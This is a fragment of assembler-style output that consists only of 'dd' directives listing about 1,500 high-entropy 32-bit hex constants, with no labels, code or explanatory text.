dd 18C0FEEBh, 0FB4C076Dh, 0AD72FC2Bh, 8CCCA2B0h, 26CABAF6h
dd 0CC50ED99h, 68C1F398h, 7136B689h, 9F313DFDh, 509C14Dh
dd 0B59B8169h, 0C0C9763Eh, 0A380468Ah, 5DD8A376h, 0D65CB123h
dd 0F38EC7BFh, 0BFD0FBEh, 0AC9CDB4Dh, 1E29E735h, 7C9E84BFh
dd 8B6C88F7h, 5107659Ah, 0CE751C52h, 0F0CDC80Dh, 0BC29E91Bh
dd 5A053354h, 0C82C5E97h, 763D6DC4h, 0F5CA7D77h, 3C6F0B3Bh
dd 134F6730h, 2BE74EFh, 17B07FC2h, 98706ECh, 7EB9BF53h
dd 3E0B5FE8h, 0A3AF4BF0h, 0A8B3BD3Fh, 0E4636350h, 70502917h
dd 771A2B04h, 2963FC45h, 9680AE37h, 6F0D81F1h, 0D46D2E3Bh
dd 8E439CECh, 4A97152Bh, 7215DD59h, 90B4A87Eh, 0BEC50282h
dd 4DD5F491h, 15511113h, 669F7905h, 0E4FC094Eh, 0EA7371EDh
dd 0DF77698Ah, 3D65EBDFh, 0B9023829h, 6325071Fh, 0A231578Eh
dd 8F02D8A1h, 0AE6E623Bh, 0CB206BBh, 0DAB7AA0Ah, 0EAEC9C37h
dd 82F24442h, 2B8CB7D2h, 836D16AAh, 0BBE49198h, 0A17F16A8h
dd 0A062D97Dh, 0DC1F9BABh, 6374DFEFh, 0A49E0FF7h, 0D656E3E3h
dd 66D3705Ch, 0E599A9B3h, 0AB94DB85h, 0BF12CF57h, 3F91E3C0h
dd 0FA611FA3h, 5B353234h, 0C489259Eh, 4D94CC5Dh, 2DAC00B6h
dd 0D62051F0h, 7EE26134h, 71D5E18Bh, 2FA5806Fh, 0CE933AE7h
dd 0EFC6EF5Eh, 0F5316237h, 58684DCEh, 0A1307AD7h, 0FECDB66Ch
dd 0ADBBAC22h, 6BAFE176h, 34D3D102h, 0E1BF2C73h, 58EC6DF7h
dd 5D45C833h, 8F89ECD5h, 0A75B063Bh, 0CB256D4Eh, 283052FDh
dd 0BDA27C5Ch, 172A6FBAh, 6330B337h, 0A5051BC4h, 0F748A85Ah
dd 0D76895DBh, 0AF1C4AE1h, 76C7E26Bh, 0D0AD45FFh, 0F49678AFh
dd 8309FADEh, 0A88AB0C6h, 87E37615h, 0A0FEA905h, 493A248Eh
dd 15A29153h, 261315C3h, 760CFE2Ch, 0F6A297AAh, 404C4C1Ch
dd 0FF56B208h, 0A754E3B2h, 9D54FA13h, 42FE688Ch, 3B79F4B7h
dd 0F6F6DCFh, 0EA76B103h, 797AE26Ch, 37080729h, 0A047A419h
dd 3EEADA76h, 2F115AB0h, 0E4B87C0Eh, 93DDFBF1h, 0C6D769FAh
dd 84BD1DA1h, 0EC4D1D9Ah, 10BA7021h, 0AFAA2AFh, 3627FEEBh
dd 0B30E7765h, 0F7467CD8h, 69565A25h, 0AF53B7D2h, 7E07C0FCh
dd 52790CC6h, 0A269C257h, 7A2D4AB5h, 6204E9B9h, 4C1ABF75h
dd 0A9EA6B35h, 6746EB18h, 0C69DF81h, 0F8B108ABh, 3FBE1D65h
dd 0EE45E791h, 6DCA3D63h, 0A2B0AE66h, 94F810C5h, 0D8E845B6h
dd 14B4D697h, 0AF472Dh, 0F0E150E8h, 0FBD63E6h, 8F1C7C2Eh
dd 2AEADE82h, 67D85AD1h, 9AA4C79Dh, 37BED943h, 0FAC7B614h
dd 6FC7DBBCh, 0CA60320Ah, 0D78308D6h, 2A7840B3h, 0FC599ADAh
dd 3A9DB103h, 0A5F95A71h, 0BA98044Fh, 27D0C4EBh, 0F0D6055Ch
dd 99260B70h, 0F1662682h, 0F7F572DBh, 6D9D65A8h, 74E01C8Dh
dd 91ADEDBh, 3FE7F15Fh, 79799783h, 0A5ED80F9h, 0D91CB6AFh
dd 39A781BFh, 44DDB340h, 8F8DFB1Ch, 0B1591F0Dh, 0E6C2F58Dh
dd 0C0F83849h, 0F8FA67F0h, 51236D37h, 5B81A58Ch, 0C6BAAAADh
dd 752D8BD2h, 440DC882h, 0BC1F902Eh, 7FDD1B3h, 6F595A96h
dd 832327A2h, 0BF748A49h, 0C8334636h, 42974247h, 1A3E8791h
dd 8917E0D1h, 25691DEEh, 44B6651Ah, 541D8803h, 2F7204A7h
dd 9EB2FF7Eh, 0D39005F8h, 0B8FA7E75h, 8AADB12Eh, 85FB6112h
dd 5E5617B6h, 1186AC2Fh, 3B5C5F9Bh, 28BFC0F2h, 0A9AE9A8Dh
dd 0C82B83ADh, 961DDE19h, 85FDFDBFh, 1C8BB306h, 44FD21F8h
dd 0B4C9F78Ch, 454A4111h, 0CFA8FF59h, 0AFB09EADh, 24AE842Dh
dd 968FC345h, 79ABB210h, 28B3AF27h, 0C9087884h, 0E180DE8Fh
dd 0A315BFA7h, 1112CB54h, 961C9FF5h, 2B869CF6h, 17DC5EA4h
dd 0CE35C841h, 7B530ACDh, 7CE8FFBAh, 1AA4B7B4h, 37D9BAECh
dd 0FED19C5Dh, 0A3C15A02h, 0C3A95661h, 267089ACh, 9F478E1Eh
dd 43F1AFEFh, 3A4203FDh, 0A2EC52A7h, 8FE3A0ABh, 0B3EAD682h
dd 614DC77Fh, 65ABFA47h, 0B4CAD05Eh, 8F9CACCCh, 9FAAD7B8h
dd 45E59651h, 373B0CCAh, 0FF672B75h, 15CF858Bh, 6F31960h
dd 3B9C892Dh, 0C22A3F0Fh, 0B8061D4Dh, 534CE81Ah, 3C0F32B7h
dd 0ABB5BA75h, 0D7B374Dh, 25932A82h, 315DF46Eh, 0E5DED46h
dd 0F553E561h, 3F577C71h, 151785BFh, 117EF9C4h, 6DA67A53h
dd 28CBEC03h, 5779A686h, 8A419F8h, 0F4ACC6BEh, 29FC79D8h
dd 0D76A0B88h, 0DE07E8AAh, 0D26C942Ah, 0FC79D7CAh, 9D5270A5h
dd 0C528BE75h, 0CF7C10Bh, 6D966FD7h, 62651167h, 353E8C2Dh
dd 0C763E16Dh, 55AD105Ch, 0CD1D2CAFh, 0D4AE398Dh, 0BCD4119Ah
dd 0D80A6F63h, 0BA7BDB6Dh, 159FCDFh, 0FF4D98Fh, 0E1A4DDADh
dd 939B195Bh, 0E17C5757h, 0DEBA5B81h, 547CF5FEh, 58A2BB36h
dd 274F4A28h, 0FFA65E36h, 17D4479Fh, 0DD35F94Fh, 28BAA8A8h
dd 36DA9312h, 0D81F5309h, 1B1AC4FAh, 0EE74BCCFh, 0BE5E7C6Ch
dd 645171D5h, 0BAC039Dh, 12ABFFBDh, 198D5317h, 7A6BE72Dh
dd 0C1ED9F55h, 98D4AF1Ah, 3B6BB0E7h, 5E672609h, 9E555611h
dd 0D3CC33CBh, 0FE704462h, 0AB8FAD07h, 61708AEAh, 3BC6966Bh
dd 8063DB5Bh, 753E9E9Fh, 0F2E3ACE1h, 0CAADC3Eh, 0D85800D9h
dd 0DD9FAD3Dh, 4AC2D481h, 8CFC4812h, 0F97A6AD6h, 0C6E6E3CEh
dd 0ED805D0Bh, 86371A5Fh, 0F4693DA1h, 7F98C92Bh, 8DCD12ADh
dd 3284C227h, 0E4ACA388h, 22CAB77Ch, 52DA5296h, 3F0502F6h
dd 98347B2Ch, 17BC75F3h, 7646CD22h, 1B898BA7h, 761ED09Bh
dd 0F843E07Fh, 0F39E0FE5h, 0AE87AE3Ah, 0FBC65AF9h, 8BBCDE27h
dd 469FD17Bh, 77B0AAF5h, 0BC481F9h, 415098D3h, 0F6D02CC7h
dd 0DA23C2FCh, 0E07CB767h, 27E21CE1h, 0A1181D8Bh, 0D3841C5Ch
dd 1E1B9481h, 0DADAA3D0h, 6E483CB0h, 0EE1C2CABh, 5A634B01h
dd 5FB78B4Bh, 0D7B6A0FFh, 0E8975E85h, 517594F6h, 0B0FD5932h
dd 923692D7h, 2ABD5594h, 4873C741h, 8F9CE0E1h, 1A1BA5BFh
dd 7554A0BFh, 95533CA8h, 0C73BE952h, 684A5741h, 7F826B16h
dd 0C1F7E34Bh, 34A81BA1h, 8EC54214h, 55764AB6h, 0D06B61F9h
dd 0C31AA92h, 4A750B8h, 4F31CFBFh, 0D6AEA230h, 559FD75Ch
dd 0F32FB57Fh, 0F4D85712h, 5B3CB481h, 0EF0BF28h, 0B682066Fh
dd 56831141h, 4568B928h, 563D1B33h, 0C4A64CB2h, 753C7187h
dd 0FB4BE448h, 0BF4ADCCBh, 6A96077Ah, 8C118936h, 0DF7A8D29h
dd 0E0353B1Eh, 5E671406h, 486A3BA4h, 0AD971555h, 95A5FD67h
dd 0A0DD5C5Bh, 446DF467h, 0D915571Ah, 0C0CB8EDDh, 0B483C048h
dd 7026D521h, 9F65704Dh, 76917AD2h, 5FB377B6h, 53476C66h
dd 92E62EB2h, 505D4C7Fh, 6ADA3589h, 7025BDB4h, 2EDFF5E5h
dd 0FE92673h, 0ABF9A8BFh, 0FCD0FBA0h, 0AFBB46A3h, 46F21B1Fh
dd 0D1990C95h, 0FA6E53FCh, 2DC7778Ah, 0F3B97C9Fh, 0FC5C7FDAh
dd 0D02B9FD4h, 5A284A57h, 9F054DFEh, 45DED5C9h, 0C7F0B271h
dd 43269DA1h, 450EB236h, 56576BBDh, 3840E94h, 719B9C5Fh
dd 2E0ADBF8h, 803FE53Bh, 0FF0B5EF0h, 0BEA7300Ch, 0DF7E5C0Eh
dd 0A6791E6Bh, 0ED2387E3h, 54B995DBh, 4DC634C5h, 0EB6F495Fh
dd 655AE2EFh, 0BAAA36C5h, 8CDC256Fh, 0D572ECF2h, 1B991239h
dd 0DA7E5087h, 6EB3A5C6h, 8CEFE5D5h, 0EB502ED6h, 0BBBA53B7h
dd 0DC7F923h, 2481FDFDh, 0E0D377D1h, 7049FB28h, 253E4ED2h
dd 0F5642F0h, 2B82D99Fh, 0B3BB06EAh, 0FEBAB2E4h, 19A85C19h
dd 9D53CFF7h, 0FBF73DAFh, 0E337B45Dh, 9898AE3Bh, 1F6C5DA6h
dd 1962C43Fh, 0B681BEB1h, 0BBC0A4B0h, 0DA0A9A0Bh, 8E63FDE0h
dd 0C2FB55B5h, 883019B8h
dd 68788E17h, 0F22BF07Bh, 0BBD5975Ch, 189047E2h, 0D2D630ACh
dd 7BFE2FCCh, 257BCA51h, 67B860D5h, 91B43FE5h, 0ABADD276h
dd 0E605327Ch, 4C952036h, 898282E0h, 46BC390h, 202B0D40h
dd 9D05695Ch, 4581BE1Eh, 0A5284A30h, 90ED0C84h, 0F1AC4A06h
dd 8D7D4657h, 0BC4BD094h, 453C664Dh, 780B1F0h, 310AC0B1h
dd 1CF06Ah, 4808393Ch, 0D18442C3h, 752D63E9h, 5174E94Ah
dd 744D28FAh, 9D0DE99Ah, 0A7413ACAh, 89D74E80h, 0A27493A0h
dd 2A9D44E9h, 8927513Ah, 0A1890F4Eh, 0E85A4453h, 3A20D974h
dd 4EB97429h, 53A09D09h, 34A5A741h, 0C47449D0h, 0E9F4C473h
dd 0FB571018h, 8304E2h, 1576CED8h, 0A7C42C46h, 2FFFA66Ch
dd 0CF9C58AEh, 12D43C92h, 4CE346D5h, 7B1E6249h, 199938B2h
dd 3BFC328h, 0CF030Bh, 2AB12288h, 33A506Eh, 28F2B5E0h
dd 0B618B93Fh, 2C069B12h, 0D9705E88h, 3A3BBA17h, 4B5B4795h
dd 47EBC716h, 557F04B4h, 0BB5A993Bh, 9A2403E7h, 0BB3175DEh
dd 0EFA5B26Dh, 0D1289A3Bh, 0A2FD773Fh, 7E317E0Fh, 226E289Fh
dd 0BE55396Fh, 0EEC914B5h, 0D0727B03h, 2F57736Dh, 51E3FF69h
dd 798F832Fh, 0FC04792h, 70B9F375h, 77035215h, 622D4E06h
dd 9289E883h, 11F65AB6h, 0D16D9518h, 0A12B5936h, 3A8E0BF3h
dd 0DF108901h, 4F46AEEDh, 3E5FC77h, 7B58D349h, 364FCAD7h
dd 0AC371882h, 0CEBBD9E0h, 2B2734B6h, 0D190895Bh, 77151A7h
dd 0D1F34AC6h, 47EE758Bh, 0FC2ED53Bh, 27C71F6Bh, 0CAE33864h
dd 75B046E6h, 1BE6BF75h, 1F060A40h, 72C46FD8h, 67E9EF13h
dd 8CE017F8h, 1139D710h, 722D6BAFh, 3FF46AFEh, 6E8B4302h
dd 0A62B9ACCh, 5A14F854h, 6A375EEDh, 357F2408h, 65DD0EA4h
dd 0F8337EB0h, 5C2BB344h, 0BB189C72h, 57B22E13h, 0B9878CEEh
dd 64E1D065h, 0DF6FB19Ch, 314E089Fh, 73D7E039h, 63AD4B48h
dd 42CCD5Dh, 6975210Bh, 0E6E9A715h, 0AF4D4AB8h, 0CAEAD0FBh
dd 1C3DE2AEh, 4AA8C26Bh, 65FE812Fh, 0A6E94260h, 95136E8h
dd 0CAACD1BCh, 0CB44BB6Ah, 21DF2519h, 51A63727h, 3B1C3728h
dd 0F312108Ah, 786FA4F3h, 5CA795F0h, 4EC7A496h, 0D1EB6251h
dd 0E23329Ah, 7A7EB2B8h, 771F2497h, 0CE0BC5E2h, 4DFE5B15h
dd 0AEDFE367h, 569B568Ch, 3697A126h, 30D848CDh, 7E256C64h
dd 0EDDF06Eh, 102C80D4h, 0EF7945DCh, 3019F929h, 0ED2AEE33h
dd 0C9E58C2Fh, 0DD4C343Ah, 31F62FE6h, 0E97ABF40h, 0AB6CC5Fh
dd 0ECEA3524h, 442130FFh, 7475A7DBh, 1E23602Bh, 0B98C353Ah
dd 45D824A3h, 0E0684BC6h, 0F45CB317h, 3546F88Eh, 0C9D99C18h
dd 0ED0DD16Bh, 0BAC7D615h, 72E6786h, 0D67C3736h, 78D0B1CCh
dd 0E715432Fh, 0FEC73CF9h, 104DB549h, 0D926F92Dh, 8DCB73ADh
dd 0F71DC61Fh, 3BF7FE45h, 0FFCA1FB5h, 128CBE4Bh, 7168EC7Fh
dd 4C4C8D7Dh, 0A05DB2BDh, 29301701h, 0E2CE6791h, 5D9F015h
dd 0F5F3D4A0h, 16374CFh, 8A9C84ADh, 0E6FF32A4h, 0FFCC89FEh
dd 7D45303Dh, 48DFB334h, 2BFD8E97h, 82472A5h, 19ED3623h
dd 0BD62ED08h, 0E9240BE1h, 1162630Bh, 7C34A8B1h, 902FB03Fh
dd 0EC6B6307h, 33C6C79Ch, 0A0411C87h, 6AF7FDB1h, 828F4C60h
dd 0E259BFBFh, 121CF4CFh, 7C8362Fh, 0E1388ECEh, 1D94AC62h
dd 0CD513F0Ch, 64BE9432h, 0C68CB5E1h, 7ED12B4Fh, 2668F6C1h
dd 93398ED9h, 477565AAh, 0C02453B4h, 50BF32D9h, 0CCBAF16Ah
dd 5FB147A8h, 59AC1D06h, 626E2AA1h, 0ED670E0Eh, 0F2ABD954h
dd 6738577Ah, 6B4E8796h, 0A1F8DFD5h, 0D918F7C8h, 86C38B4Bh
dd 0E48BEF70h, 0EC963EBBh, 57AE7F21h, 0D60A1CC6h, 0EA93C08h
dd 5FB950FEh, 717C5973h, 9F2CBDA7h, 0A0460C5Bh, 9551C331h
dd 0F78AE8E8h, 0C48C94B2h, 0E34AF4B9h, 0D3D298BAh, 0C1048B0Ah
dd 84C5F525h, 0AB584D7Fh, 44E4997Fh, 4B282886h, 4BEC43B4h
dd 0FD4CF675h, 81DAB465h, 175EE237h, 78F5B639h, 1E53A515h
dd 8D523B3h, 7C6CDAFDh, 6ECB31A8h, 0EBD7A307h, 0A148E07Ch
dd 73B1A85Ah, 9AFFEC4Ah, 0FAB1251Bh, 0D733C395h, 92146B0Bh
dd 6577C6BEh, 6FF667EEh, 0DE856B6Bh, 753901CBh, 0E92C45B1h
dd 1416E064h, 5667C1Eh, 0D2A0250h, 0B36A3F27h, 77C2C5B8h
dd 8B346B74h, 3422C723h, 44FC28EEh, 8AD9D803h, 49B92BE8h
dd 0AA7A9540h, 0DA116FB6h, 2BD13CEFh, 0CB920DA3h, 0F977FDE0h
dd 0AE69CE32h, 0DF172318h, 412D7F54h, 66518D7Ch, 0A5C19CE9h
dd 5B58AF9Eh, 0F04A11Dh, 5488A1F8h, 27964DB3h, 1D6CBAB9h
dd 1C638EE3h, 5AE4CB61h, 4328ACB9h, 860F9C56h, 0EF3A833Fh
dd 5213C5D1h, 35C919B5h, 0A38FFFCAh, 0D2CD6E58h, 2B6CFEB6h
dd 0BE6F7794h, 0E3683E76h, 1AACEFB2h, 55F7D94Eh, 0A4204BAFh
dd 4FD7BDDAh, 0D86B9192h, 264941EAh, 851A621Dh, 91FECE9Fh
dd 0AEB43A1h, 479C3027h, 0E414B016h, 0BBB6DED9h, 0D4CED313h
dd 91CA672Ch, 0CC8C107Fh, 99BB2F42h, 0B5FE06E6h, 871F7114h
dd 97CFF1B8h, 0FE5B2913h, 8EB6E2E5h, 5B677BD6h, 0B5D80617h
dd 2D1D66BCh, 0DFC5C5B6h, 5C1F25A3h, 0E7E7D991h, 0C8DC0B2Ch
dd 59B5B22Fh, 3B655FAAh, 0FD88B9C0h, 0FBFCFEF3h, 7C68CC68h
dd 0A73BCC1Bh, 602DD416h, 57A1DC4Ah, 0EC6C1837h, 0CEC74AD5h
dd 0F9A3CEC0h, 7ABC2B0Eh, 0C21D269Ah, 0E26DEA27h, 0EB3E10A2h
dd 8DC316BEh, 73AFED1Eh, 5BF0F1B4h, 2CAE88ABh, 67AC3E6Ch
dd 6B4FE750h, 62E38FC0h, 0F07908F7h, 454623FBh, 8AE0102Bh
dd 0EF5216Eh, 0CBA37C1Bh, 0BB9075AFh, 9C3F367Fh, 59D0C40Ch
dd 79C8135Ah, 2DD62AA2h, 2A8A85FBh, 0A3438E5Eh, 6B9389DDh
dd 6D2FF19Ch, 0C045AB96h, 49C2A8B2h, 69489A5Ah, 0B425AE2Dh
dd 0DFA5773Fh, 0B1A3CE30h, 85F07B77h, 265D13F0h, 9499F21h
dd 0CBCCC1FFh, 2A4EA34Ch, 0A2A34A98h, 9DF49993h, 956E8BEBh
dd 363BCE60h, 0DA5DB213h, 43F18E1Ch, 7B2AB587h, 0CC9C1DCCh
dd 16AE6D78h, 0E97FC354h, 0FA4B095Fh, 1C26B1FBh, 5FA3683Dh
dd 0F5D8412Ch, 3736AF39h, 3B7E69AAh, 0C4E1D6A1h, 0CDB52AAh
dd 184EC6B9h, 0B82BA0C2h, 7CF24135h, 7E4E06ADh, 671D31B0h
dd 0A943FB8Bh, 31591596h, 0D523B0A0h, 85CEF3C6h, 0B51664A9h
dd 5FB8329Ch, 0F445802Bh, 0B6DAC3F0h, 0E0B4E0F9h, 732E4761h
dd 0CA175F1Fh, 203B488Fh, 0C7B1EB55h, 554DFBFAh, 0B9022C6Eh
dd 0E2D1348Dh, 0DC19A579h, 0A9C7AA6Ch, 62C8792Dh, 13C582A1h
dd 5DBBE0EFh, 528DAEE9h, 59C214F6h, 35B671A3h, 0C1832F03h
dd 4C0C80D0h, 79EAB92Bh, 5B126F03h, 0A27F3BA0h, 99B583CAh
dd 9F54BE0Fh, 0F655DAE7h, 359FB551h, 0DF39D2D1h, 65DAB156h
dd 8F212345h, 53BF572Eh, 4979F6E3h, 47248C2h, 8F885F38h
dd 370F96B4h, 710B55CAh, 9585C7DCh, 9AE2FE09h, 32FC4798h
dd 0CB6B512h, 6FE3E9CDh, 48DDD0Ah, 0CBABFDA3h, 0D71F675Fh
dd 93607DE8h, 3EC6E206h, 0B9887D5Dh, 8EB16AB4h, 0E6648073h
dd 824EDA29h, 0F45033A7h, 550D86B4h, 0BE62BA5Bh, 625A8B07h
dd 9A8D471Fh, 92F356D4h, 0D414426Ch, 0D5FB6B55h, 0A2374B59h
dd 0C42B5DCAh, 6B9716A0h, 0DD6C6031h, 2372F91Ch, 917E4BFAh
dd 6486CDBFh, 0F03F3305h, 4BDFB9D7h, 0DDF45ECFh, 0F7833902h
dd 0C752B0E7h, 0DE9E5CE9h, 2195D0FCh, 0A0A40F8Bh, 0DCAFA261h
dd 4D96571Ch, 0BE3B42AEh, 0AAA78B6Ah, 8511851Eh, 8B1EA43Bh
dd 66CF3E34h, 688CC052h, 874CDB65h, 0AFCADADAh, 4A2DE5B9h
dd 0AE36993Eh, 287EE4ACh
dd 3D8AB69Ch, 65225C06h, 492E1473h, 992A87E3h, 4332F6C8h
dd 290B4BFAh, 1774AACCh, 0D92C9666h, 0D39E9342h, 1AE30FE6h
dd 0B99BB1E8h, 81ECB922h, 0F541D521h, 0B2346E69h, 6AEA42F6h
dd 0DEA8633Fh, 0A6225274h, 7A0AADA0h, 88D798AAh, 0A48966BFh
dd 36D50E23h, 509F4689h, 0BE5E3AF3h, 138D3D3Ah, 0FC694966h
dd 625C8647h, 161F7920h, 0F87F17DBh, 0BC196B88h, 561D2AF2h
dd 2BC67E07h, 938355AFh, 0D63E299Eh, 0BBCECD41h, 0E0370AA2h
dd 5A7C0973h, 7BD976Ah, 98924E36h, 9C292CA3h, 0A5593788h
dd 0C9CEEEh, 42275C09h, 5F729743h, 0DDBE37D1h, 0D5810124h
dd 8498963Dh, 33DC9A7h, 7A6FAF2Bh, 36A5A4F3h, 67550687h
dd 0C0F1B39Ch, 0D9F5963Eh, 3379FE3Ch, 683675F1h, 5D277159h
dd 0EBF1C5C8h, 0DF62B9ECh, 72AAC69Fh, 48C4E09Fh, 0EE01EF65h
dd 0F8896214h, 0A5C46ED6h, 0EE7929FEh, 1C83B531h, 0A5B1D333h
dd 0ACBA98ABh, 0A572C88Ch, 0A33CE08Ch, 6C2E2AFh, 2FD2D249h
dd 0BF02035Ah, 4BBE57C6h, 24E3952h, 48B1AFB4h, 5B891FE0h
dd 339E5B45h, 0A9C72B2Fh, 0C5E9AA7Ch, 0DA0DEA1Eh, 74B594E2h
dd 0BD987964h, 876E79A8h, 4CC77E1Fh, 821A574Ah, 56832BD5h
dd 0E702F606h, 5BAF72AFh, 0C7D999CBh, 51ED0D0Dh, 9BAB1D86h
dd 7D5D1FBAh, 8EF18B8Dh, 5A756897h, 6E49FB6Ah, 0E0AC7159h
dd 13B45C16h, 89A2491Ch, 7533C646h, 0CED6EAC0h, 0D1BED9C3h
dd 654D76C2h, 8C16C24Fh, 5F756352h, 97E107E6h, 568E2E8Bh
dd 7591D766h, 10C06E75h, 0F19AAC33h, 5E19FBA0h, 2EEA1BE8h
dd 0D5024B3Eh, 2C65AB9Ch, 8F7B81B4h, 7CB3E5CEh, 0D6F96B65h
dd 6627D8BEh, 0FC0F7C93h, 0F7A74295h, 95253F99h, 0A60DDD18h
dd 0ADCF5C4Fh, 4EE94A7Dh, 0B8ACC242h, 5ACA1812h, 2AC9F625h
dd 4BEDA876h, 0BA8DD319h, 9C4ECBC6h, 0AB619617h, 0ED9557B4h
dd 18BF1057h, 0EEE867F3h, 91E6F26Dh, 2FACAE07h, 1A65D1E7h
dd 233B8991h, 0CBF58605h, 0E73D585Fh, 482AAD18h, 0DEC12425h
dd 6263C461h, 0CBBAB18Eh, 21F8CD6Ch, 840C0919h, 4EFA8266h
dd 66C29B2Fh, 7701EA69h, 0F6F648F5h, 6B022D37h, 0F333D15Ah
dd 0E696991Ch, 0FBA1A00Bh, 4454A9C6h, 5E270C81h, 0AE9FF0ADh
dd 763217FDh, 1967FBFCh, 1BAE2DBBh, 3DE82229h, 0BF9D21BFh
dd 6BEEAFC1h, 0A0C3A6E5h, 0A45F2CADh, 149CEDB6h, 82547633h
dd 0FB0273D6h, 828A3C6Ah, 719DA8BFh, 61474A7Ah, 0ACEBFA9Dh
dd 361FDE5Eh, 674C3EB6h, 9EC480BFh, 57FC2AADh, 3C9A814h
dd 0FDB3BF93h, 88258941h, 0A303A641h, 4C273641h, 608F0E23h
dd 1597990h, 0EE25CAC3h, 1760E26Eh, 13F05914h, 2AD44129h
dd 0A2622C96h, 0E972CA5Bh, 0C81AA9F2h, 0C778BA72h, 0E3B3B42Eh
dd 8AB376B9h, 0F6744341h, 54EF725Eh, 50253503h, 0B7DBB45Ch
dd 0F3444D4Fh, 7CA612BEh, 5EBD2AF2h, 558B19E6h, 44ED762Bh
dd 0FB0345BEh, 0EE2901B6h, 28C2EAA7h, 0D3FA1511h, 35B268F0h
dd 8459BDA2h, 0CCF8BFBEh, 777B48Eh, 6844381Fh, 0A0B1CBE2h
dd 0B218E442h, 0DE7439FBh, 0DDF66A6Ah, 0FE9F22B4h, 98B56D66h
dd 0B25E41B7h, 24907841h, 0F57FC54Ah, 66D80DDFh, 0C896EDACh
dd 0AB7B758Dh, 20FA7636h, 8C948C53h, 755CD8BAh, 6E2A277Bh
dd 0D129D633h, 5675E53Ch, 0AEFF2421h, 0CC6ECCA5h, 0C62FBB75h
dd 7970256Fh, 0DB65F7E1h, 4362CAF8h, 0DA36A2C3h, 47DAA5B8h
dd 439395EDh, 3F1F7578h, 8C2F79E5h, 0F5AA78B2h, 96FB6542h
dd 5C5DD015h, 96D05F9h, 3EF60ACFh, 37C13C87h, 0D180069Ch
dd 67AD810Ah, 0D03CB755h, 0BDC87078h, 8B9A0F9Bh, 0A05686FBh
dd 1B43EE9Bh, 20BA1482h, 0FA34AA62h, 2B7048B3h, 0CE0B19EBh
dd 783A7B8Ch, 0F468F355h, 3FB79D0Eh, 0EEBFA4EFh, 1147327Dh
dd 491D8A9Bh, 71AEED52h, 6B4760E0h, 0E374AC55h, 34720689h
dd 0BB97F5CFh, 0EABF1D2Ch, 0AC49FB45h, 0DD0FA28h, 0F89975F2h
dd 1CFD3CF6h, 29B9CB45h, 0A24C2E8h, 0AFB1FA8Fh, 0FD0F7726h
dd 0AF91C977h, 0EA75712Ch, 20E8404Ah, 0CDC88BB3h, 0F25E2F35h
dd 507D6E55h, 0C78A2A78h, 49468445h, 0B3197AD4h, 4C39535Bh
dd 82AB05F2h, 9559C3Ah, 0A1025974h, 5EAB0E81h, 4EDBFE5Dh
dd 9D3CD160h, 905001E3h, 917DA99Dh, 3D892883h, 17F0301Eh
dd 572BB4CFh, 0DF1A4862h, 0BF2F6707h, 7E3E791Eh, 52B42B41h
dd 0A5640E21h, 54247CB2h, 21558E12h, 0EFC19B46h, 6CCA8D43h
dd 9282EA5Ch, 0DB15C10Dh, 69D3E2C9h, 0A7D7D33Fh, 54B1E87Ch
dd 0B8C2DD5Bh, 5A48892h, 0F5BE123h, 0EA5A7D9Ch, 0FA97B182h
dd 15B6D67Ch, 21C5C368h, 8C03D6A6h, 310EFC30h, 677DE477h
dd 1D1BC79Dh, 168101C6h, 8B725578h, 0E1CCE3B5h, 0A41C5468h
dd 0AB0A6427h, 576F7B17h, 73A1D3E4h, 0BE07D989h, 0C7CCF13Fh
dd 590D85A3h, 0CD514962h, 723D4A46h, 99E01C17h, 4A3851DFh
dd 8B19164Eh, 0A4BB3C88h, 0B4D0310h, 9ECB35Ah, 3D5BBE3Bh
dd 0F0F32FF2h, 723EB33Eh, 1CC672B8h, 0B9ABEE2Eh, 168FC9D6h
dd 7D6F3926h, 0E3C95419h, 6938B59Ah, 0A7C297F4h, 7829BF8Ch
dd 87764Dh, 4B0E174Ch, 21815524h, 2E92947Eh, 62A4FD56h
dd 308E1761h, 20CF4D31h, 0B57D0F96h, 6EC4896Dh, 70E4236Eh
dd 0F427F775h, 539397FDh, 62D0D27Fh, 7FC8CD95h, 62F6EA73h
dd 5195999Dh, 0BA95ECCBh, 0A1C81650h, 909F222Fh, 623A48F4h
dd 968A53F6h, 0AC44C9FAh, 0F8645EA1h, 0DEBDF07Ah, 0AB50A26Eh
dd 0CF7956C0h, 0E1F817F7h, 0A0CEC3FBh, 0EAAEAF92h, 81F0D4CAh
dd 0BCB75229h, 9C4CF83Dh, 0B0306EF0h, 0B98EAB13h, 411CAB46h
dd 0F70FB18Bh, 0EE6946D2h, 0E7E0C1E6h, 70B43F56h, 0F50797B7h
dd 0F3D39972h, 0FCA00FD6h, 5518789Ah, 0AD6FA531h, 0E31E94A6h
dd 0AB2190DDh, 0C73B8D6Fh, 67725F8Dh, 0FC240BB1h, 0C7279B0h
dd 6461B90h, 2D6B5B0Bh, 67D8A573h, 2129656h, 0EC3BC0B1h
dd 0A13CEBEDh, 0B2EFCBF2h, 0BAC595ABh, 4F3A5394h, 6B5481E7h
dd 0B0B0DF05h, 681DE950h, 0FD5A22FFh, 0AD0D66E0h, 0DBFD91FAh
dd 585754A8h, 0FEFC733Bh, 4D11929Ch, 0C809282Ch, 0D198E628h
dd 3F0AE14Fh, 2FFD0A0Ah, 732A7F67h, 5ECAA365h, 58AD8AA5h
dd 435E3276h, 1E7DEB81h, 278773B8h, 771FEF1Bh, 0D4E1E677h
dd 55F9E5F3h, 0CC12D340h, 0D8AEB079h, 346B80D8h, 0A6853BBDh
dd 0C65F34D5h, 5F7D2EFBh, 212E321Bh, 476B47B7h, 18ADB31Eh
dd 0EECD0C5Fh, 0A546445Ah, 77BF719Eh, 0EFAA6C28h, 36A11296h
dd 2A1C7E0Ah, 4C081B7Fh, 85001E6Ch, 25157D52h, 7E1BE4DCh
dd 0E993F360h, 0BC9C08FCh, 3335E3C1h, 31944827h, 78D779Ah
dd 310AA2D3h, 0D767C3B1h, 96B4C2B8h, 55CEFBABh, 0C4A266F4h
dd 54DD232Dh, 1DD63F24h, 2786AB34h, 0BDD5890Dh, 2251D13Dh
dd 88529CA5h, 0AA1A063Ch, 7896A96Fh, 0BA977D13h, 48282623h
dd 6F457DD5h, 6F9BE2C8h, 6D706D13h, 0E9DBAEC1h, 41B856BBh
dd 0A6E9409h, 32BBF126h, 9CB47513h, 964857CDh, 1D706A3Bh
dd 0DBC64A8Eh, 0DFC283B8h, 60D3E918h, 426B9501h, 1CEEDD28h
dd 310E8CBCh, 0E667E1EDh, 0D4CA2C4Fh, 0E0D0914Bh, 5EF2CA17h
dd 0D92A7F74h, 0FDB2F7ECh, 5E7B9BD6h, 0DF9E88B2h, 8C7BEE28h
